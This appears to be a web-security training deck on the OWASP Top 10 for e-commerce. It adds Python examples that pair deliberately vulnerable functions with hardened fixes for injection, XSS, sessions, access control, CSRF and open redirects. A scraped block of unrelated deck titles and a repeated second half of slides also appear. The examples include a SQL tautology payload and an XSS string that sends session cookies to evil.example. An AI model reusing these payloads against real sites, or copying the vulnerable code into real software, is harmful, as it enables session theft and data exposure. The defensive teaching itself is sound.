“security@ecommerce”
Where We Are?
Recent attacks on e-commerce sites show the vulnerability: an intruder was able to make unauthorized calls to view and manipulate data.
• Transaction system calls are open publicly.
• Some Web API calls are still served over plain HTTP.
• The same username/password is used across multiple clients/channels.
• Most internal applications are open publicly.
Top 10 OWASP Security Guidelines (OWASP Top 10, 2013 edition)
A1 – Injection
A2 – Broken Authentication and Session Management
A3 – Cross-Site Scripting (XSS)
A4 – Insecure Direct Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery (CSRF)
A9 – Using Components with Known Vulnerabilities
A10 – Unvalidated Redirects and Forwards
A1 – Injection
How?
• Untrusted input is concatenated into a query for an interpreter: SQL injection, LDAP query injection.
Impact
• Unintended commands are executed.
• Data can be accessed without proper authentication.
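Added example, not code from the original deck: the injection the slide describes, in Python with the standard sqlite3 module. The vulnerable function concatenates the customer name into the SQL text; the hardened one binds it as a parameter. The orders table, its rows and the function names are constructed for this example.

```python
import sqlite3

# Constructed sample data for this example (not taken from the deck):
# an orders table holding rows that belong to two different customers.
SAMPLE_ORDERS = [
    (1, "alice", "book", 12.50),
    (2, "alice", "lamp", 30.00),
    (3, "bob", "phone", 499.99),
]


def make_db():
    """Create an in-memory SQLite database seeded with the constructed orders."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT, item TEXT, amount REAL)"
    )
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)", SAMPLE_ORDERS)
    conn.commit()
    return conn


def orders_for_customer_vulnerable(conn, customer):
    """Deliberately vulnerable: the customer name is pasted into the SQL text, so a
    quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = (
        "SELECT id, customer, item, amount FROM orders "
        "WHERE customer = '" + customer + "'"
    )
    return conn.execute(sql).fetchall()


def orders_for_customer_safe(conn, customer):
    """Hardened: the value is bound as a parameter, so it can only ever be data."""
    sql = "SELECT id, customer, item, amount FROM orders WHERE customer = ?"
    return conn.execute(sql, (customer,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # A tautology payload: the vulnerable query returns every customer's orders,
    # the parameterised query returns nothing because no customer has that name.
    payload = "alice' OR '1'='1"
    print("vulnerable:", orders_for_customer_vulnerable(db, payload))
    print("safe:      ", orders_for_customer_safe(db, payload))
```

The same rule applies to LDAP filters and any other interpreter: the untrusted value must reach the engine as data (a bound parameter or a properly escaped literal), never as part of the statement text.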
A2 – Broken Auth & Session Mgmt.
How?
• Authentication and session management are not implemented properly (weak password storage, guessable or non-expiring session ids, session ids that are not rotated on login).
Impact
• Attackers assume user identities and gain access.
• Attackers get hold of passwords, tokens and session keys.
A3 – Cross Site Scripting (XSS)
How?
• The application takes untrusted data and sends it to a web browser without proper validation or escaping.
Impact
• Hijack user sessions.
• Redirect users to malicious sites.
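Added example, not code from the original deck: a product review rendered with and without output escaping in Python, using the standard-library html.escape and urllib.parse.quote. The hostile review text, author name and function names are constructed for this example.

```python
import html
from urllib.parse import quote

# Constructed hostile inputs for this example (not from the deck): a review body
# carrying a script that exfiltrates the session cookie, and an author name that
# breaks out of an attribute to add an event handler.
HOSTILE_REVIEW = (
    "Great lamp! <script>new Image().src="
    "'https://evil.example/c?'+document.cookie</script>"
)
HOSTILE_NAME = 'mallory" onmouseover="alert(document.cookie)'


def render_review_vulnerable(author, body):
    """Deliberately vulnerable: untrusted strings are pasted straight into the markup."""
    return f'<div class="review" data-author="{author}"><p>{body}</p></div>'


def render_review_safe(author, body):
    """Hardened: each untrusted value is escaped for the HTML context it lands in.
    quote=True (the default) also escapes quotes, which is what keeps the author
    name inside the attribute value."""
    return (
        f'<div class="review" data-author="{html.escape(author, quote=True)}">'
        f"<p>{html.escape(body)}</p></div>"
    )


def profile_link_safe(username):
    """A value placed in a URL path needs URL encoding first, then HTML escaping,
    because the attribute is parsed as HTML before the browser sees the URL."""
    return (
        f'<a href="/users/{html.escape(quote(username, safe=""))}">'
        f"{html.escape(username)}</a>"
    )


def script_or_handler_survives(rendered):
    """Check used to compare the two renderers: did a live <script> tag or an
    event-handler attribute make it into the output unescaped?"""
    return "<script" in rendered or ' onmouseover="' in rendered
```

Escaping is context-specific: the same string needs different treatment in element text, in an attribute value, inside a URL and inside a script block, which is why a template engine with contextual auto-escaping is preferable to hand-placed escape calls.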
A4 – Insecure Direct Object References
How?
• The developer exposes references to internal objects (files, XML objects, DB keys) without checking that the caller is authorized for that particular object.
Impact
• Attackers manipulate these references to access unauthorized data.
A5 – Security Misconfiguration
How?
• Web servers and DB servers do not implement adequate security policies (default accounts, unpatched software, verbose error pages, unnecessary services left enabled).
Impact
• Unable to trace the origin of a command.
• Cannot have good control to
A6 – Sensitive Data Exposure
How?
• Hashing and encryption are inadequate when storing sensitive data such as passwords, credit card numbers, etc.
• Payment info is transmitted in plain text.
Impact
• An intruder gets access to payment info, thereby causing brand damage.
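Added example covering both A2 and A6 above (not code from the original deck): passwords stored as salted, iterated PBKDF2 hashes and verified in constant time, plus session ids that are random, expire when idle and are rotated on login so a pre-set id never becomes an authenticated one. The iteration count, the timeout, the users mapping and the function names are assumptions for this example.

```python
import hashlib
import hmac
import os
import secrets
import time

# Tunables chosen for this example (assumptions, not values from the deck).
PBKDF2_ITERATIONS = 600_000
SESSION_TTL_SECONDS = 15 * 60


def hash_password(password, salt=None):
    """Store passwords as salted, iterated PBKDF2-HMAC-SHA256 in a self-describing
    string, never as plain text or as an unsalted single hash."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


# Verified for unknown usernames so login timing does not reveal which names exist.
DUMMY_HASH = hash_password("not-a-real-password")


class SessionStore:
    """Server-side sessions keyed by an unguessable random id, with an idle timeout."""

    def __init__(self, now=time.time):
        self._now = now  # injectable clock so expiry can be exercised deterministically
        self._sessions = {}  # session id -> (username, last-seen timestamp)

    def create(self, username):
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not a counter
        self._sessions[sid] = (username, self._now())
        return sid

    def user_for(self, sid):
        """Resolve a session id to a user, dropping sessions idle past the timeout."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        username, last_seen = entry
        if self._now() - last_seen > SESSION_TTL_SECONDS:
            self._sessions.pop(sid, None)
            return None
        self._sessions[sid] = (username, self._now())
        return username

    def destroy(self, sid):
        self._sessions.pop(sid, None)


def login(users, sessions, username, password, old_sid=None):
    """Verify the password hash, then issue a fresh session id. Rotating the id on
    login means an id fixed by an attacker beforehand never becomes authenticated."""
    stored = users.get(username, DUMMY_HASH)
    if not (verify_password(password, stored) and username in users):
        return None
    if old_sid is not None:
        sessions.destroy(old_sid)
    return sessions.create(username)
```

The session id itself must only ever travel in a cookie marked Secure and HttpOnly over HTTPS; card numbers should not be stored at all but handed to the payment provider, which removes the storage problem rather than hashing it.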
A7 – Missing Function Level Access Control
How?
• Function-level access rights are not verified on the server at the time of the request; the function is merely hidden in the UI.
• Attackers forge requests to those functions directly.
Impact
• Unauthorized access to functionality and data.
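Added example for A4 and A7 together (not code from the original deck): an order lookup that checks ownership before returning the referenced record, and an admin-only function whose role check runs on the server for every call, regardless of whether the UI showed a link. The order records, users, roles and function names are constructed for this example.

```python
import functools
from dataclasses import dataclass


class AccessDenied(Exception):
    """Raised when the caller is not allowed to reach an object or a function."""


@dataclass(frozen=True)
class User:
    name: str
    roles: frozenset


# Constructed data for this example (not from the deck): orders keyed by their DB id,
# exactly the kind of reference that ends up in URLs such as /orders/1002.
ORDERS = {
    1001: {"owner": "alice", "item": "book", "amount": 12.50},
    1002: {"owner": "bob", "item": "phone", "amount": 499.99},
}


def get_order_vulnerable(order_id):
    """Deliberately vulnerable (A4): whoever knows or guesses an id gets the record."""
    return ORDERS[order_id]


def get_order(current_user, order_id):
    """Hardened: resolve the reference, then check that the caller owns the object.
    Missing and foreign orders get the same error so ids cannot be enumerated."""
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != current_user.name:
        raise AccessDenied(f"order {order_id} is not accessible to {current_user.name}")
    return order


def requires_role(role):
    """Enforce the role on the server for every call (A7). Hiding the admin link in
    the UI is not a control; a forged request arrives here regardless."""
    def decorator(fn):
        @functools.wraps(fn)
        def wrapper(current_user, *args, **kwargs):
            if role not in current_user.roles:
                raise AccessDenied(f"{current_user.name} lacks role {role!r}")
            return fn(current_user, *args, **kwargs)
        return wrapper
    return decorator


@requires_role("admin")
def refund_order(current_user, order_id):
    """Admin-only operation; the decorator is the access check."""
    order = ORDERS[order_id]
    return {**order, "refunded_by": current_user.name}


def try_call(fn, *args):
    """Helper for exercising the checks: returns ("ok", result) or ("denied", message)."""
    try:
        return ("ok", fn(*args))
    except AccessDenied as exc:
        return ("denied", str(exc))
```

The check has to sit in the data access path or the handler itself, not in the routing layer or the template, so that every way of reaching the function (API, mobile client, internal tool) goes through it.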
A8 – Cross Site Request Forgery (CSRF)
How?
• The victim's browser automatically attaches the session cookie (or other authentication token) to every request to the site, so an attacker's page can make the browser send a forged HTTP request that carries the victim's credentials.
Impact
• The forged requests look legitimate to the application, which executes them with the victim's privileges and is thereby compromised.
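Added example, not code from the original deck: the synchronizer-token defence against the forged request described above, written in Python with the HTTP request represented as a plain dict. The allowed origin, the request shape and the endpoint name are assumptions for this example.

```python
import hmac
import secrets

# Origin allow-list for this example (assumption, not a value from the deck).
ALLOWED_ORIGINS = {"https://shop.example"}


class CsrfProtection:
    """Synchronizer-token pattern: one unguessable token per session, embedded by the
    server in its own forms and required on every state-changing request."""

    def __init__(self):
        self._tokens = {}  # session id -> csrf token

    def token_for(self, session_id):
        if session_id not in self._tokens:
            self._tokens[session_id] = secrets.token_urlsafe(32)
        return self._tokens[session_id]

    def validate(self, session_id, submitted):
        expected = self._tokens.get(session_id)
        if expected is None or submitted is None:
            return False
        return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_transfer(csrf, request):
    """State-changing endpoint. The browser attaches the session cookie to every
    request to this site, including ones an attacker's page triggers, so the cookie
    proves who the user is but not who built the request. The token does."""
    sid = request["cookies"].get("session")
    if sid is None:
        return "401 not logged in"
    if request["method"] != "POST":
        return "405 state changes must be POST"
    # Defence in depth: a browser sets Origin on cross-site POSTs, and an attacker's
    # page cannot forge it. Absence is tolerated for older clients; mismatch is not.
    origin = request["headers"].get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return "403 cross-origin request refused"
    if not csrf.validate(sid, request["form"].get("csrf_token")):
        return "403 CSRF token missing or invalid"
    return f"200 transferred {request['form']['amount']} to {request['form']['to']}"


def make_request(method, session, origin, form):
    """Build a constructed request dict in the shape handle_transfer expects."""
    headers = {} if origin is None else {"Origin": origin}
    return {
        "method": method,
        "cookies": {"session": session},
        "headers": headers,
        "form": form,
    }
```

The token must be per session (not global) and never sent in a GET URL, otherwise it leaks through the Referer header; the SameSite cookie attribute is a further, browser-enforced layer on top of this.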
A9 – Using Components With Known Vulnerabilities
How?
• Frameworks, libraries and other components run with the application's full privileges, and versions with known vulnerabilities stay in use.
Impact
• Any vulnerability in these components becomes a vulnerability in the main application.
A10 – Unvalidated Redirects and Forwards
How?
• No validation is in place when redirecting or forwarding to other pages and applications; the target is taken from a request parameter.
Impact
• Phishing attacks redirect users to attacker-controlled applications through which sensitive information can be captured.
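Added example, not code from the original deck: validating a redirect target taken from a request parameter before sending the browser there, using only urllib.parse from the standard library. The host allow-list, the default target and the function name are assumptions for this example.

```python
from urllib.parse import urlsplit

# Assumptions for this example (not values from the deck): the hosts a login page may
# legitimately send the user on to, and where to go when the target is untrusted.
ALLOWED_HOSTS = {"shop.example", "pay.shop.example"}
DEFAULT_TARGET = "/account"


def safe_redirect_target(next_param):
    """Return a redirect target derived from an untrusted `next` parameter, or the
    default. Only same-site relative paths and absolute URLs on allow-listed hosts pass."""
    if not next_param:
        return DEFAULT_TARGET
    candidate = next_param.strip()
    # Backslashes and control characters: browsers turn "/\" into "//", and CR/LF
    # could split the Location header, so refuse them outright.
    if any(ch == "\\" or ord(ch) < 0x20 for ch in candidate):
        return DEFAULT_TARGET
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: exactly one leading slash. "//host" is scheme-relative
        # (urlsplit gives it a netloc) and "///host" collapses to it in some
        # browsers, so both are rejected.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return DEFAULT_TARGET
    # Absolute URL: scheme and host must both be on the allow-list. Comparing
    # parts.hostname rather than the raw string defeats "https://shop.example@evil.example"
    # and "https://shop.example.evil.example".
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return candidate
    return DEFAULT_TARGET
```

Where the set of legitimate destinations is small, the safer design is to pass an index into a server-side table instead of a URL, so that nothing user-controlled reaches the Location header at all.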
Next Steps...
Proactive approach: it is better to beef up now than to repent later.
Security should be reviewed constantly, and code reviews need to put emphasis on it.
Security@ecommerce

Introduction of Cybersecurity with OSS at Code Europe 2024
 
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and BioinformaticiansBiomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 

A7 – Missing Function Level Access Control
How ?
• The server does not check, for each request, whether the logged-in user is allowed to call the requested function; only the UI hides the privileged links or buttons.
• Attackers forge requests directly to those functions.
Impact
• Unauthorized access to privileged functions and the data behind them.
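The slide describes the failure but not what the fix looks like in code. The following is an added example, not code from the deck or from any real shop: a framework-free Python stand-in for a request, a refund handler that trusts a client-supplied `is_admin` flag, and the same handler behind a server-side role check. The `Request` class, the roles `customer`/`support`/`admin`, the `/admin/refund` path and the users are all constructed for the example.

```python
"""Server-side function-level access control (OWASP A7), as an added example.

Everything here is constructed for the example: the Request stand-in, the
roles, the refund handler and the users. None of it comes from the deck or
from a real e-commerce system.
"""
from dataclasses import dataclass, field
from functools import wraps


class Forbidden(Exception):
    """Raised when the caller's session does not carry a permitted role."""


@dataclass
class Request:
    path: str
    params: dict = field(default_factory=dict)   # client-supplied, forgeable
    session: dict = field(default_factory=dict)  # server-side, bound to the login


def refund_order_vulnerable(req: Request) -> str:
    """Vulnerable: the only 'check' is a flag the client sends itself.

    Hiding the refund button from non-admin users in the UI does nothing once
    an attacker crafts the request by hand and adds is_admin=1.
    """
    if req.params.get("is_admin") == "1":
        return f"refunded {req.params['order_id']}"
    return "refund not offered"


def require_role(*allowed: str):
    """Decorator that enforces the role check on the server for every call."""
    def decorator(handler):
        @wraps(handler)
        def wrapper(req: Request):
            role = req.session.get("role")          # never read from params
            if role not in allowed:
                raise Forbidden(f"{handler.__name__}: role {role!r} not in {allowed}")
            return handler(req)
        return wrapper
    return decorator


@require_role("admin", "support")
def refund_order(req: Request) -> str:
    """Hardened: reachable only with a session whose role is permitted."""
    return f"refunded {req.params['order_id']}"


def demo() -> dict:
    # Constructed forged request: a logged-in customer adds is_admin=1 by hand.
    forged = Request("/admin/refund",
                     params={"order_id": "A1001", "is_admin": "1"},
                     session={"user": "mallory", "role": "customer"})
    # Constructed legitimate request from a support user; no flag needed.
    staff = Request("/admin/refund",
                    params={"order_id": "A1001"},
                    session={"user": "alice", "role": "support"})
    results = {"vulnerable_forged": refund_order_vulnerable(forged)}
    try:
        results["hardened_forged"] = refund_order(forged)
    except Forbidden as exc:
        results["hardened_forged"] = f"403 {exc}"
    results["hardened_staff"] = refund_order(staff)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:17} -> {outcome}")
```

The point of the decorator is that the decision is made on the server from session state the client cannot edit, and that it is attached to the function itself rather than to the link that leads to it, so a hand-crafted request hits the same check as a click in the UI.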
A8 – Cross Site Request Forgery
How ?
• The victim's browser automatically attaches the session cookie or authentication token to requests, so a malicious page can make the browser send forged HTTP requests to the application.
Impact
• The forged requests look legitimate to the application, and state-changing actions run with the victim's privileges.
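To make the "forged request looks legitimate" point concrete, here is an added example (not from the deck) of the classic synchronizer-token defence in plain Python: an email-change handler that trusts the cookie-bound session alone, next to the same handler that also demands a per-session token the legitimate page embedded in its form. The session dictionaries, the `/account/email` form, the field name `csrf_token` and the sample requests are constructed for the example.

```python
"""Synchronizer-token defence against CSRF (OWASP A8), as an added example.

The session dictionaries, form field names and sample requests are
constructed for the example; they are not from the deck or from a real
application.
"""
import hmac
import secrets

TOKEN_FIELD = "csrf_token"  # same name in the session and in the form


def issue_csrf_token(session: dict) -> str:
    """One unguessable token per login session, stored only server-side."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def render_form(session: dict) -> str:
    """The legitimate page embeds the token; an attacker's page cannot read it."""
    return ('<form method="POST" action="/account/email">'
            f'<input type="hidden" name="{TOKEN_FIELD}" value="{issue_csrf_token(session)}">'
            '<input name="email"><button>Save</button></form>')


def verify_csrf(session: dict, form: dict) -> bool:
    expected = session.get(TOKEN_FIELD)
    submitted = form.get(TOKEN_FIELD)
    if not isinstance(expected, str) or not isinstance(submitted, str):
        return False
    # Constant-time compare so timing does not leak how many bytes matched.
    return hmac.compare_digest(expected.encode(), submitted.encode())


def change_email_vulnerable(session: dict, form: dict) -> str:
    """Vulnerable: trusts the cookie-bound session alone.

    The victim's browser attaches the session cookie to any request a
    malicious page makes to this site, so the check passes for forged requests.
    """
    if "user" not in session:
        return "401 not logged in"
    session["email"] = form["email"]
    return f"200 email changed to {form['email']}"


def change_email(session: dict, form: dict) -> str:
    """Hardened: the token proves the request came from a page we served."""
    if "user" not in session:
        return "401 not logged in"
    if not verify_csrf(session, form):
        return "403 CSRF token missing or invalid"
    session["email"] = form["email"]
    return f"200 email changed to {form['email']}"


def demo() -> dict:
    session = {"user": "alice", "email": "alice@example.com"}
    render_form(session)  # a normal page load issues the token
    # Constructed forged POST from an attacker's page: cookies ride along, token does not.
    forged = {"email": "mallory@evil.example"}
    # Constructed genuine POST submitted from the rendered form.
    genuine = {"email": "alice@new.example", TOKEN_FIELD: session[TOKEN_FIELD]}
    return {
        "vulnerable_forged": change_email_vulnerable(dict(session), forged),
        "hardened_forged": change_email(session, forged),
        "hardened_guessed": change_email(session, {**forged, TOKEN_FIELD: "A" * 43}),
        "hardened_genuine": change_email(session, genuine),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:17} -> {outcome}")
```

The token works because the same-origin policy stops the attacker's page from reading the form we served, so it cannot copy the value the browser would otherwise happily send along with the cookie. Marking the session cookie `SameSite=Lax` or `Strict` is a complementary browser-side defence, not a replacement for the server-side check.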
A9 – Components With Known Vulnerabilities
How ?
• Frameworks, libraries and other components run with the full privileges of the application, and outdated versions with publicly known vulnerabilities stay in use.
Impact
• Any vulnerability in a component becomes a vulnerability of the main application.
A10 – Unvalidated Redirects and Forwards
How ?
• No validation of the target when redirecting or forwarding to other pages and applications, so a user-supplied parameter decides where the browser is sent.
Impact
• Phishing: attackers send victims through a trusted-looking URL to a malicious site that captures sensitive information; unvalidated forwards can reach pages the user is not authorized to see.
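The slide says "no validation in place" without showing what correct validation has to cope with. The block below is an added example, not from the deck: a Python check for a post-login `next` parameter that resolves the value against the application's own origin and accepts it only if the result is HTTPS on an allow-listed host. It goes beyond the slide in also covering the inputs that defeat naive checks (protocol-relative `//host`, backslashes, userinfo `@` tricks, suffix-matching hosts, `javascript:` targets). The parameter name `next`, the origin `https://shop.example`, the allow-listed hosts and the `/account` default are assumptions for the example.

```python
"""Validating a user-supplied redirect target (OWASP A10), as an added example.

The `next` parameter, the origin shop.example, the host allowlist and every
sample input are constructed for the example; none of it is from the deck.
"""
from urllib.parse import urljoin, urlsplit

APP_ORIGIN = "https://shop.example"                        # assumed application origin
ALLOWED_HOSTS = {"shop.example", "checkout.shop.example"}  # assumed trusted hosts
DEFAULT_TARGET = "/account"                                # assumed safe fallback


def redirect_vulnerable(next_param: str) -> str:
    """Vulnerable: whatever ?next= says is where the browser is sent."""
    return next_param


def safe_redirect_target(next_param, base=APP_ORIGIN, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Return an absolute HTTPS URL on an allowed host, or the default target.

    Resolving against our own origin first means a relative path such as
    /orders/42 becomes https://shop.example/orders/42, while a protocol-relative
    //evil.example becomes https://evil.example and fails the host check.
    """
    if not isinstance(next_param, str):
        return DEFAULT_TARGET
    # Browsers drop ASCII tab/newline inside URLs and treat "\" like "/", so
    # normalise the same way before deciding anything.
    candidate = "".join(ch for ch in next_param.strip() if ch not in "\t\r\n")
    candidate = candidate.replace("\\", "/")
    if not candidate:
        return DEFAULT_TARGET
    resolved = urljoin(base, candidate)
    parts = urlsplit(resolved)
    if parts.scheme != "https":            # rejects http://, javascript:, data:, ...
        return DEFAULT_TARGET
    host = (parts.hostname or "").lower()  # hostname strips userinfo and port
    if host not in allowed_hosts:          # exact match: no endswith() suffix tricks
        return DEFAULT_TARGET
    return resolved


def demo() -> dict:
    # Constructed ?next= values: one legitimate, the rest attacker-controlled.
    samples = [
        "/orders/42?ref=email",
        "https://checkout.shop.example/pay?o=42",
        "//evil.example/login",
        "/\\evil.example/login",
        "https://shop.example.evil.example/login",
        "https://shop.example@evil.example/login",
        "javascript:alert(document.cookie)",
        "http://shop.example/orders/42",
    ]
    return {s: safe_redirect_target(s) for s in samples}


if __name__ == "__main__":
    for given, chosen in demo().items():
        print(f"{given:45} -> {chosen}")
```

Two design choices matter here: the check runs on the resolved absolute URL rather than on the raw string, so it cannot be bypassed by a form the parser and the browser read differently, and the host comparison is an exact set lookup, because `endswith("shop.example")` would accept `notshop.example` and `hostname`-less `startswith` checks would accept `https://shop.example@evil.example`.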
Next Steps...
• Take a proactive approach: it is better to beef up security now than to repent later.
• Review security continuously, and give it explicit emphasis during code reviews.